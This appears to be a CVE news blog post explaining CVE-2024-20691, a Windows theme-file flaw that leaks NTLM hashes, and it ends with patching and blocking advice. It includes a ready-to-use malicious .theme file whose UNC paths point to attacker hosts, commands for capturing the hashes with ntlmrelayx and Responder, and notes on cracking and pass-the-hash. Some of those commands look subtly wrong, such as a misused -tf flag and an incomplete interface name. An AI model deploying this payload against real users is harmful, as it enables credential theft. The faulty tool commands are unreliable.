CVE CyberSecurity Database News

CVE-2024-20691 - Breaking Down the Windows Themes Information Disclosure Vulnerability

Poster -

In January 2024, Microsoft patched a new information disclosure vulnerability — CVE-2024-20691. This bug might not sound as flashy as a remote code execution flaw, but behind its simple name lies a pathway for hackers to silently gather sensitive details from your system, all thanks to how Windows processes theme files. In this article, we’ll break down how this works, how an attack could happen, and what you can do to stay safe.

What Is CVE-2024-20691?

Windows allows users to customize the look and feel of their systems using “themes”. These include settings for wallpaper, colors, sounds, and more, bundled into a .theme or .themepack file.

CVE-2024-20691 is an information disclosure vulnerability related to how Windows handles theme files. When specially crafted, these files could trick Windows into leaking the NTLM authentication hash of the user, or potentially other local information, to an external attacker-controlled server. This is possible because of the way theme files can reference remote resources, like images or sound files.

Severity: This vulnerability is rated “Important”. You still need user interaction — the target has to open or apply a malicious theme — but it can be very effective in phishing or social engineering attacks.

How Does the Exploit Work?

When Windows applies a theme, it processes all referenced files — including images and sounds — even if the path points to an external (network or internet) location.

A typical .theme file might have this section

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\Web\Wallpaper\Windows\img.jpg

[Sounds]
SystemStart=c:\windows\media\WindowsLogon.wav

But what if the attacker edits it to this?

[Control Panel\Desktop]
Wallpaper=\\attacker.com\share\wallpaper.jpg

Or:

[Sounds]
SystemStart=\\evilhost.com\media\evil.wav

When Windows applies the theme, it will try to load these files, even from remote SMB shares. If the file refers to a UNC path (beginning with \\), Windows tries to connect, and in the process, automatically negotiates using the NTLM protocol, sending a hashed version of your user credentials (NTLM hash) to the attacker’s server.

Save the following as exploit.theme

[Theme]
DisplayName=Malicious Theme

[Control Panel\Desktop]
Wallpaper=\\192.168.56.1\share\leak.jpg

[Sounds]
SystemStart=\\192.168.56.1\media\leak.wav

Replace 192.168.56.1 with your attacker’s machine IP.

When a victim double-clicks exploit.theme, their system tries to fetch these resources, sending out their NTLM hash to your server.

Running the Attack & Capturing Hashes

Attackers set up a fake SMB server to capture the hash using tools like Impacket’s smbserver.py and ntlmrelayx.py.

Example

python3 ntlmrelayx.py -smb2support -tf hashes.txt

Or, for just logging hashes

python3 responder.py -I eth

Once the victim opens the malicious theme, you’ll see a connection and their NTLM hash appear in your terminal.

What Can Attackers Do With NTLM Hashes?

- Crack the hash: If the user’s password is weak, it can be cracked offline with tools like Hashcat.
- Pass-the-hash attack: In some cases, attackers can use the NTLM hash as-is to authenticate to internal servers (SMB/LDAP/HTTP) without ever knowing the plaintext password.

Attacker crafts a .theme file with resources pointing to a server under their control.

2. Attacker lures target to open/apply the malicious theme.

Diagram

[Attacker Theme File]
     |
     v
[Victim Applies Theme]
     |
     v
[Windows connects to SMB share]
     |
     v
[Attacker captures NTLM hash]

Mitigation & Recommendations

- Apply the official patch: Microsoft released a fix for this in January 2024 Patch Tuesday. Update your Windows system.
- Block outbound SMB/CIFS (TCP 445/139) at the perimeter: Prevents your machine from connecting to remote SMB servers.

Don’t open theme files from untrusted sources: Treat theme files like executables!

- Disable NTLM where possible: Read more on Microsoft’s guidance.

References & Further Reading

- Official CVE-2024-20691 Advisory
- Microsoft Patch Tuesday Jan 2024
- Impacket GitHub
- Older but related attack: Windows Themes & NTLM Leaks (2012) - Check Point blog
- Disable NTLM in your network - Microsoft Docs

In Conclusion

CVE-2024-20691 is a reminder that small, seemingly harmless files like Windows themes can hide big dangers. Theme files are just text and can be hand-edited, so always handle them with care. Phishing is as much about tricking people as it is about technical exploits, so be wary of customizing your Windows experience with files you didn't make yourself.

Patch your systems, educate your users, and keep your guards up — even for something as innocent as a new desktop wallpaper.

Timeline

Published on: 01/09/2024 18:15:52 UTC
Last modified on: 04/11/2024 20:15:15 UTC